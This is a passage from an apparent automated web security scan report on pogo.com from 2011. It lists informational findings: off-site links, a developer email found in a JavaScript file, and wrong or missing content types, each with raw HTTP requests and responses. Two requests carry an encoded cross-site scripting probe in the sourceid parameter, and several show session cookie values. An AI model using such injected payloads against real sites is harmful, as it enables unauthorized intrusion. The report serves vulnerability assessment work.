Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Fri, 24 Jun 2011 13:39:27 GMT
Server: Apache-Coyote/1.1
Content-Length: 12392


                       <html>
<head>

   <title>Pogo.com - The Ultimate Online Gaming Experience!</title>


   <link rel="StyleSheet" href="/v/FO57ZA/include/css/misc/marketing/landing.css"/>

   <sc
...[SNIP]...
<!-- end of Omniture Tag -->


<img src="http://network.realmedia.com/RealMedia/ads/adstream_nx.ads/TRACK_Pogo/Retarget_Nonsecure@Bottom3" width="1" height="1" border="0">


<div align="center">
...[SNIP]...
<noscript>
   <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=7,0,19,0" width="755" height="550">
       <param name="movie" value="media/Pogo_General_LP_2.swf">
...[SNIP]...
<li><a href="http://www.clubpogo.com/?site=pogo&pageSection=footer_joinclubpogo">Club Pogo</a>
...[SNIP]...
<li><a href="http://www.info.ea.com/?pageSection=footer_corpinfo" rel="nofollow">Corporate Info</a>
...[SNIP]...
<li><a class="popup||1021|600|yes|true" href="http://www.ea.com/global/legal/legalnotice.jsp?pageSection=footer_legalnotice" rel="nofollow">Legal Notices</a>
...[SNIP]...
<li><a class="popup||800|600|yes|true" href="http://tos.ea.com/legalapp/WEBPRIVACY/US/en/PC/?pageSection=footer_privacy" rel="nofollow">Privacy Policy</a>
...[SNIP]...
<li><a class="popup||800|600|yes|true" href="http://tos.ea.com/legalapp/WEBTERMS/US/en/PC?pageSection=footer_tos" rel="nofollow">Terms of Service</a>
...[SNIP]...
<li><a href="http://www.ea.com/pc" onclick="if(typeof OmnitureCustomLink=='function')OmnitureCustomLink('un_fteapt_pc')">PC Games</a>
...[SNIP]...
<li><a href="http://www.ea.com/wii" onclick="if(typeof OmnitureCustomLink=='function')OmnitureCustomLink('un_fteapt_wii')">Wii</a></li>
   
       <li><a href="http://www.ea.com/online" onclick="if(typeof OmnitureCustomLink=='function')OmnitureCustomLink('un_fteapt_online')">Web</a></li>
   
       <li><a href="http://www.ea.com/xbox-360" onclick="if(typeof OmnitureCustomLink=='function')OmnitureCustomLink('un_fteapt_xbox')">Xbox 360</a>
...[SNIP]...
<li><a href="http://www.ea.com/ps3" onclick="if(typeof OmnitureCustomLink=='function')OmnitureCustomLink('un_fteapt_ps')">PS3</a></li>
   
       <li><a href="http://www.ea.com/iphone" onclick="if(typeof OmnitureCustomLink=='function')OmnitureCustomLink('un_fteapt_iphone')">iPhone</a>
...[SNIP]...
<li><a href="http://www.ea.com/ipad" onclick="if(typeof OmnitureCustomLink=='function')OmnitureCustomLink('un_fteapt_ipad')">iPad</a></li>
   
       <li><a href="http://www.ea.com/mobile" onclick="if(typeof OmnitureCustomLink=='function')OmnitureCustomLink('un_fteapt_mobile')">Mobile</a>
...[SNIP]...
</div>
       
           
                           <iframe width="1" height="1" hspace="0" vspace="0" frameborder="0" scrolling="no" src="http://fls.doubleclick.net/activityi;src=1494613;type=usfoo615;cat=usfoo777;ord=1669051283"></iframe>
...[SNIP]...

4.4. http://www.pogo.com/pogo-online-games/lp-GeneralPogo-withoutFB.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.pogo.com
Path:   /pogo-online-games/lp-GeneralPogo-withoutFB.jsp

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pogo-online-games/lp-GeneralPogo-withoutFB.jsp?sourceid=free_internet_games_Broad_Free_GOO_C0080_A0001_LP0001&kw=free%20internet%20games&ad=6429295350&sitetarget= HTTP/1.1
Host: www.pogo.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Expires: 0
Cache-Control: max-age=0, private
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Fri, 24 Jun 2011 13:30:17 GMT
Server: Apache-Coyote/1.1
Content-Length: 12361


                       <html>
<head>

   <title>Pogo.com - The Ultimate Online Gaming Experience!</title>


   <link rel="StyleSheet" href="/v/FO57ZA/include/css/misc/marketing/landing.css"/>

   <sc
...[SNIP]...
<!-- end of Omniture Tag -->


<img src="http://network.realmedia.com/RealMedia/ads/adstream_nx.ads/TRACK_Pogo/Retarget_Nonsecure@Bottom3" width="1" height="1" border="0">


<div align="center">
...[SNIP]...
<noscript>
   <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=7,0,19,0" width="755" height="550">
       <param name="movie" value="media/Pogo_General_LP_2.swf">
...[SNIP]...
<li><a href="http://www.clubpogo.com/?site=pogo&pageSection=footer_joinclubpogo">Club Pogo</a>
...[SNIP]...
<li><a href="http://www.info.ea.com/?pageSection=footer_corpinfo" rel="nofollow">Corporate Info</a>
...[SNIP]...
<li><a class="popup||1021|600|yes|true" href="http://www.ea.com/global/legal/legalnotice.jsp?pageSection=footer_legalnotice" rel="nofollow">Legal Notices</a>
...[SNIP]...
<li><a class="popup||800|600|yes|true" href="http://tos.ea.com/legalapp/WEBPRIVACY/US/en/PC/?pageSection=footer_privacy" rel="nofollow">Privacy Policy</a>
...[SNIP]...
<li><a class="popup||800|600|yes|true" href="http://tos.ea.com/legalapp/WEBTERMS/US/en/PC?pageSection=footer_tos" rel="nofollow">Terms of Service</a>
...[SNIP]...
<li><a href="http://www.ea.com/pc" onclick="if(typeof OmnitureCustomLink=='function')OmnitureCustomLink('un_fteapt_pc')">PC Games</a>
...[SNIP]...
<li><a href="http://www.ea.com/wii" onclick="if(typeof OmnitureCustomLink=='function')OmnitureCustomLink('un_fteapt_wii')">Wii</a></li>
   
       <li><a href="http://www.ea.com/online" onclick="if(typeof OmnitureCustomLink=='function')OmnitureCustomLink('un_fteapt_online')">Web</a></li>
   
       <li><a href="http://www.ea.com/xbox-360" onclick="if(typeof OmnitureCustomLink=='function')OmnitureCustomLink('un_fteapt_xbox')">Xbox 360</a>
...[SNIP]...
<li><a href="http://www.ea.com/ps3" onclick="if(typeof OmnitureCustomLink=='function')OmnitureCustomLink('un_fteapt_ps')">PS3</a></li>
   
       <li><a href="http://www.ea.com/iphone" onclick="if(typeof OmnitureCustomLink=='function')OmnitureCustomLink('un_fteapt_iphone')">iPhone</a>
...[SNIP]...
<li><a href="http://www.ea.com/ipad" onclick="if(typeof OmnitureCustomLink=='function')OmnitureCustomLink('un_fteapt_ipad')">iPad</a></li>
   
       <li><a href="http://www.ea.com/mobile" onclick="if(typeof OmnitureCustomLink=='function')OmnitureCustomLink('un_fteapt_mobile')">Mobile</a>
...[SNIP]...
</div>
       
           
                           <iframe width="1" height="1" hspace="0" vspace="0" frameborder="0" scrolling="no" src="http://fls.doubleclick.net/activityi;src=1494613;type=usfoo615;cat=usfoo777;ord=1787957212"></iframe>
...[SNIP]...

4.5. http://www.pogo.com/pogo-online-games/lp-GeneralPogo-withoutFB.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.pogo.com
Path:   /pogo-online-games/lp-GeneralPogo-withoutFB.jsp

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pogo-online-games/lp-GeneralPogo-withoutFB.jsp?sourceid=free_internet_games_Broad_Free_GOO_C0080_A0001_LP000112f2b%253c%252fscript%253e%253cscript%253ealert%2528document.location%2529%253c%252fscript%253ec356c9d923d&ad=6429295350&kw=free+internet+games&sitetarget= HTTP/1.1
Host: www.pogo.com
Proxy-Connection: keep-alive
Referer: http://burp/show/9
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_pers=%20s_nr%3D1308922657327-New%7C1311514657327%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; prod.JID=F75360B2ABFAB522FEF8F8DD3F1261CB.000208; com.pogo.unid=6618892495612956

Response

HTTP/1.1 200 OK
Expires: 0
Cache-Control: max-age=0, private
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Fri, 24 Jun 2011 13:39:04 GMT
Server: Apache-Coyote/1.1
Content-Length: 12412


                       <html>
<head>

   <title>Pogo.com - The Ultimate Online Gaming Experience!</title>


   <link rel="StyleSheet" href="/v/FO57ZA/include/css/misc/marketing/landing.css"/>

   <sc
...[SNIP]...
<!-- end of Omniture Tag -->


<img src="http://network.realmedia.com/RealMedia/ads/adstream_nx.ads/TRACK_Pogo/Retarget_Nonsecure@Bottom3" width="1" height="1" border="0">


<div align="center">
...[SNIP]...
<noscript>
   <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=7,0,19,0" width="755" height="550">
       <param name="movie" value="media/Pogo_General_LP_2.swf">
...[SNIP]...
<li><a href="http://www.clubpogo.com/?site=pogo&pageSection=footer_joinclubpogo">Club Pogo</a>
...[SNIP]...
<li><a href="http://www.info.ea.com/?pageSection=footer_corpinfo" rel="nofollow">Corporate Info</a>
...[SNIP]...
<li><a class="popup||1021|600|yes|true" href="http://www.ea.com/global/legal/legalnotice.jsp?pageSection=footer_legalnotice" rel="nofollow">Legal Notices</a>
...[SNIP]...
<li><a class="popup||800|600|yes|true" href="http://tos.ea.com/legalapp/WEBPRIVACY/US/en/PC/?pageSection=footer_privacy" rel="nofollow">Privacy Policy</a>
...[SNIP]...
<li><a class="popup||800|600|yes|true" href="http://tos.ea.com/legalapp/WEBTERMS/US/en/PC?pageSection=footer_tos" rel="nofollow">Terms of Service</a>
...[SNIP]...
<li><a href="http://www.ea.com/pc" onclick="if(typeof OmnitureCustomLink=='function')OmnitureCustomLink('un_fteapt_pc')">PC Games</a>
...[SNIP]...
<li><a href="http://www.ea.com/wii" onclick="if(typeof OmnitureCustomLink=='function')OmnitureCustomLink('un_fteapt_wii')">Wii</a></li>
   
       <li><a href="http://www.ea.com/online" onclick="if(typeof OmnitureCustomLink=='function')OmnitureCustomLink('un_fteapt_online')">Web</a></li>
   
       <li><a href="http://www.ea.com/xbox-360" onclick="if(typeof OmnitureCustomLink=='function')OmnitureCustomLink('un_fteapt_xbox')">Xbox 360</a>
...[SNIP]...
<li><a href="http://www.ea.com/ps3" onclick="if(typeof OmnitureCustomLink=='function')OmnitureCustomLink('un_fteapt_ps')">PS3</a></li>
   
       <li><a href="http://www.ea.com/iphone" onclick="if(typeof OmnitureCustomLink=='function')OmnitureCustomLink('un_fteapt_iphone')">iPhone</a>
...[SNIP]...
<li><a href="http://www.ea.com/ipad" onclick="if(typeof OmnitureCustomLink=='function')OmnitureCustomLink('un_fteapt_ipad')">iPad</a></li>
   
       <li><a href="http://www.ea.com/mobile" onclick="if(typeof OmnitureCustomLink=='function')OmnitureCustomLink('un_fteapt_mobile')">Mobile</a>
...[SNIP]...
</div>
       
           
                           <iframe width="1" height="1" hspace="0" vspace="0" frameborder="0" scrolling="no" src="http://fls.doubleclick.net/activityi;src=1494613;type=usfoo615;cat=usfoo777;ord=845147675"></iframe>
...[SNIP]...

4.6. http://www.pogo.com/pogo-online-games/lp-GeneralPogo-withoutFB.jsp  previous

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.pogo.com
Path:   /pogo-online-games/lp-GeneralPogo-withoutFB.jsp

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pogo-online-games/lp-GeneralPogo-withoutFB.jsp?sourceid=free_internet_games_Broad_Free_GOO_C0080_A0001_LP000112f2b%253c%252fscript%253e%253cscript%253ealert%2528document.location%2529%253c%252fscript%253ec356c9d923d&ad=6429295350&kw=free+internet+games&sitetarget= HTTP/1.1
Host: www.pogo.com
Proxy-Connection: keep-alive
Referer: http://burp/show/5
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_pers=%20s_nr%3D1308922304648-New%7C1311514304648%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; prod.JID=C84030ABB66027F38F1EBD321C1C3F57.000144; com.pogo.unid=6618922560387636

Response

HTTP/1.1 200 OK
Expires: 0
Cache-Control: max-age=0, private
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Fri, 24 Jun 2011 13:37:09 GMT
Server: Apache-Coyote/1.1
Content-Length: 12416


                       <html>
<head>

   <title>Pogo.com - The Ultimate Online Gaming Experience!</title>


   <link rel="StyleSheet" href="/v/FO57ZA/include/css/misc/marketing/landing.css"/>

   <sc
...[SNIP]...
<!-- end of Omniture Tag -->


<img src="http://network.realmedia.com/RealMedia/ads/adstream_nx.ads/TRACK_Pogo/Retarget_Nonsecure@Bottom3" width="1" height="1" border="0">


<div align="center">
...[SNIP]...
<noscript>
   <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=7,0,19,0" width="755" height="550">
       <param name="movie" value="media/Pogo_General_LP_2.swf">
...[SNIP]...
<li><a href="http://www.clubpogo.com/?site=pogo&pageSection=footer_joinclubpogo">Club Pogo</a>
...[SNIP]...
<li><a href="http://www.info.ea.com/?pageSection=footer_corpinfo" rel="nofollow">Corporate Info</a>
...[SNIP]...
<li><a class="popup||1021|600|yes|true" href="http://www.ea.com/global/legal/legalnotice.jsp?pageSection=footer_legalnotice" rel="nofollow">Legal Notices</a>
...[SNIP]...
<li><a class="popup||800|600|yes|true" href="http://tos.ea.com/legalapp/WEBPRIVACY/US/en/PC/?pageSection=footer_privacy" rel="nofollow">Privacy Policy</a>
...[SNIP]...
<li><a class="popup||800|600|yes|true" href="http://tos.ea.com/legalapp/WEBTERMS/US/en/PC?pageSection=footer_tos" rel="nofollow">Terms of Service</a>
...[SNIP]...
<li><a href="http://www.ea.com/pc" onclick="if(typeof OmnitureCustomLink=='function')OmnitureCustomLink('au_fteapt_pc')">PC Games</a>
...[SNIP]...
<li><a href="http://www.ea.com/wii" onclick="if(typeof OmnitureCustomLink=='function')OmnitureCustomLink('au_fteapt_wii')">Wii</a></li>
   
       <li><a href="http://www.ea.com/online" onclick="if(typeof OmnitureCustomLink=='function')OmnitureCustomLink('au_fteapt_online')">Web</a></li>
   
       <li><a href="http://www.ea.com/xbox-360" onclick="if(typeof OmnitureCustomLink=='function')OmnitureCustomLink('au_fteapt_xbox')">Xbox 360</a>
...[SNIP]...
<li><a href="http://www.ea.com/ps3" onclick="if(typeof OmnitureCustomLink=='function')OmnitureCustomLink('au_fteapt_ps')">PS3</a></li>
   
       <li><a href="http://www.ea.com/iphone" onclick="if(typeof OmnitureCustomLink=='function')OmnitureCustomLink('au_fteapt_iphone')">iPhone</a>
...[SNIP]...
<li><a href="http://www.ea.com/ipad" onclick="if(typeof OmnitureCustomLink=='function')OmnitureCustomLink('au_fteapt_ipad')">iPad</a></li>
   
       <li><a href="http://www.ea.com/mobile" onclick="if(typeof OmnitureCustomLink=='function')OmnitureCustomLink('au_fteapt_mobile')">Mobile</a>
...[SNIP]...
</div>
       
           
                           <iframe width="1" height="1" hspace="0" vspace="0" frameborder="0" scrolling="no" src="http://fls.doubleclick.net/activityi;src=1494613;type=usfoo615;cat=usfoo777;ord=1295694527"></iframe>
...[SNIP]...

5. Email addresses disclosed  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.pogo.com
Path:   /v/FSMQBg/include/js/shared/markup2.js

Issue detail

The following email address was disclosed in the response:

Issue background

The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.

However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.

Issue remediation

You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).

Request

GET /v/FSMQBg/include/js/shared/markup2.js HTTP/1.1
Host: www.pogo.com
Proxy-Connection: keep-alive
Referer: http://www.pogo.com/pogo-online-games/lp-GeneralPogo-withoutFB.jsp?sourceid=free_internet_games_Broad_Free_GOO_C0080_A0001_LP0001&ad=6429295350&kw=free+internet+games&sitetarget=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: prod.JID=3E01A5E24CD32774E6EF83CEAF1EADF3.000099; com.pogo.unid=6618690632146297

Response

HTTP/1.1 200 OK
Age: 4950
Date: Fri, 24 Jun 2011 12:15:40 GMT
Expires: Wed, 22 Jun 2016 12:15:40 GMT
Cache-Control: max-age=157680000
Content-Length: 8840
Connection: Keep-Alive
Via: POGO-EDGE
ETag: W/"8840-1301347758000"
Last-Modified: Mon, 28 Mar 2011 21:29:18 GMT
Content-Type: text/javascript
Vary: Accept-Encoding
Server: Apache-Coyote/1.1

// copyright ea.com 2007

// This js allows the use of 'progressive enhancement' markup using class attributes rather than inline javascript.
// @see http://domscripting.com/presentations/xtech2006/

...[SNIP]...
<img src="path/to/image.gif" class="imgover" />
//    make sure your hover image is named image-over.gif
//    jsainz@ea.com 2007-03-02
Markup.imgOvers = function() {
   if (!document.getElementById) return
   
   var aPreLoad = new Array();
   var sTempSrc;
   
   var aInputs = document.getElementsByTagName("input");
   var aImg = docum
...[SNIP]...

6. Content type incorrectly stated  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.pogo.com
Path:   /include/css/pogo.css

Issue detail

The response contains the following Content-type statement:The response states that it contains CSS. However, it actually appears to contain HTML.

Issue background

If a web response specifies an incorrect content type, then browsers may process the response in unexpected ways. If the specified content type is a renderable text-based format, then the browser will usually attempt to parse and render the response in that format. If the specified type is an image format, then the browser will usually detect the anomaly and will analyse the actual content and attempt to determine its MIME type. Either case can lead to unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the presence of an incorrect content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.

Request

GET /include/css/pogo.css HTTP/1.1
Host: www.pogo.com
Proxy-Connection: keep-alive
Referer: http://www.pogo.com/pogo-online-games/lp-GeneralPogo-withoutFB.jsp?sourceid=free_internet_games_Broad_Free_GOO_C0080_A0001_LP0001&ad=6429295350&kw=free+internet+games&sitetarget=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: prod.JID=3E01A5E24CD32774E6EF83CEAF1EADF3.000099; com.pogo.unid=6618690632146297

Response

HTTP/1.1 200 OK
Age: 5183
Date: Fri, 24 Jun 2011 12:15:43 GMT
Content-Length: 4640
Connection: Keep-Alive
Via: POGO-EDGE
ETag: W/"4640-1294693595000"
Last-Modified: Mon, 10 Jan 2011 21:06:35 GMT
Content-Type: text/css
Vary: Accept-Encoding
Server: Apache-Coyote/1.1

<style TYPE="text/css">
<!--
.aa {font-family:Arial, Helvetica, sans-serif}
img {border-width:0}

.default {font-family: Arial, Helvetica, sans-serif; font-size: 12px; color: #000000}
.dflt {font-fami
...[SNIP]...

7. Content type is not specified  previous

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.pogo.com
Path:   /favicon.ico

Issue description

If a web response does not specify a content type, then the browser will usually analyse the response and attempt to determine the MIME type of its content. This can have unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the absence of a content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.

Request

GET /favicon.ico HTTP/1.1
Host: www.pogo.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: prod.JID=3E01A5E24CD32774E6EF83CEAF1EADF3.000099; com.pogo.unid=6618690632146297; s_pers=%20s_nr%3D1308921994778-New%7C1311513994778%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Age: 5199
Date: Fri, 24 Jun 2011 12:15:40 GMT
Connection: Keep-Alive
Via: POGO-EDGE
ETag: W/"766-1118367449000"
Last-Modified: Fri, 10 Jun 2005 01:37:29 GMT
Content-Length: 766
Server: Apache-Coyote/1.1

...... ..............(... ...@.........................................................................................................................................................................
...[SNIP]...

Report generated by XSS.CX at Sat Jun 25 09:37:05 CDT 2011.